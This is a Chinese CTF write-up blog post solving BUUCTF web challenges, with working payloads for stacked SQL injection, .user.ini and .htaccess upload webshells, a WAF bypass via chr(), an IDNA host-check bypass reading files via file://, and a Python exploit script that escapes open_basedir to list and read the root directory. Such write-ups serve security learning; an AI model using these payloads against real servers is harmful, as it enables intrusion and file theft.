BUUCTF-SUCTF做题笔记

BUUCTF
发布日期:   2021-06-03
文章字数:   1.1k

[SUCTF 2019]EasySQL

1 堆叠注入,可以查到库和表

1;show databases;

1;show tables;
  • 发现有Flag表,但是不能查看

payload:

*,1

想不出来。。。

image-20210601232857980

[SUCTF 2019]CheckIn

1 检查了文件前几个字母,是否符合文件个是

2. 先上传一个.user.ini文件

auto_prepend_file=某个文件字段,表示在本目录下打开任何一个php文件,都会包含这个文件并且以php解析。

image-20210602101831222

3. 上传a.jpg图片马

由于过滤了<?,用其他方式代替

image-20210602102142781

上传成功,显示

image-20210602102050694

image-20210602102521881

访问给出目录的index.php文件

访问成功的标志:

image-20210602102805830

用蚁剑连接

刷新之后,找到跟了目录下的flag文件;

image-20210602103005163

[RoarCTF 2019]Easy Calc

  • 有waf,但并不是calc.php的源码。
  • 根据php特性,想绕过waf,就要绕过name参数,那么在 name前面加空格就可以

可以执行命令,但是 "/"被绕过,因此采用chr(47)

ascii字符转换表

http://node3.buuoj.cn:27903/calc.php?%20num=1;var_dump(scandir(chr(47)));

image-20210602120215234

http://node3.buuoj.cn:27903/calc.php?%20num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

image-20210602120452250

[SUCTF2019]

  • 题目环境
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")
    host = parse.urlparse(url).hostname
    if host == 'suctf.cc':
        return "我扌 your problem? 111"
    parts = list(urlsplit(url))
    host = parts[1]
    if host == 'suctf.cc':
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)
    #去掉 url 中的空格
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl).read()
    else:
        return "我扌 your problem? 333"
  • 在unicode中字符℀(U+2100),当IDNA处理此字符时,会将℀变成a/c,因此当你访问此url时,dns服务器会自动将url重定向到另一个网站。如果服务器引用前端url时,只对域名做了限制,那么通过这种方法,我们就可以轻松绕过服务器对域名的限制了。

nginx重要文件位置:


配置文件存放目录:/etc/nginx
主配置文件:/etc/nginx/conf/nginx.conf
管理脚本:/usr/lib64/systemd/system/nginx.service
模块:/usr/lisb64/nginx/modules
应用程序:/usr/sbin/nginx
程序默认存放位置:/usr/share/nginx/html
日志默认存放位置:/var/log/nginx
配置文件目录为:/usr/local/nginx/conf/nginx.conf

Payload:

file://suctf.c℆sr/local/nginx/conf/nginx.conf

file://suctf.c℆sr/fffffflag

SUCTF EasyWEB

  • 源码:
<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>
  • 解题脚本
    1. 上传.htaccess
    2. 上传php木马
    3. 绕过open_base_dir(执行木马时绕过)

无字母数字生成字符串:

<?php
function finds($string){
	$index = 0;
	$a=[33,35,36,37,40,41,42,43,45,47,58,59,60,62,63,64,92,93,94,123,125,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255];
	for($i=27;$i<count($a);$i++){
		for($j=27;$j<count($a);$j++){
			$x = $a[$i] ^ $a[$j];
			for($k = 0;$k<strlen($string);$k++){
				if(ord($string[$k]) == $x){
					echo $string[$k]."\n";
					echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j])."\n";
					$index++;
					if($index == strlen($string)){
						return 0;
					}
				}
			}
		}
	}
}
finds("_GET");
?>

解题流程

import requests
import base64
htaccess =b'''
#define width 1337
#define height 1337
AddType application/x-httpd-php .ahhh
php_value auto_append_file "php://filter/convert.base64-decode/resource=./shell.ahhh"
'''

shell = b"GIF89a12" + base64.b64encode(b"<?php chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));?>")
#shell = b"GIF89a12" + base64.b64encode(b"<?php chdir('img');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');echo(file_get_contents('/THis_Is_tHe_F14g')));?>")#

url = "http://67aab0d5-adf1-4709-bfbc-2246b1d31aa9.node4.buuoj.cn:81?_=${%86%86%86%86^%d9%c1%c3%d2}{%86}();&%86=get_the_flag"
files = {'file': ('.htaccess',htaccess,'iamge/jpeg')}
data = {"upload":"submit"}

response = requests.post(url,data=data,files=files)
print(response.text)

files = {'file':('shell.ahhh',shell,'image/jpeg')}
response = requests.post(url=url, data=data, files=files)
print(response.text)
文章作者: 尘落
文章链接: http://39.105.134.199/2021/06/03/7766.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 尘落 !
BUUCTF
评论
  目录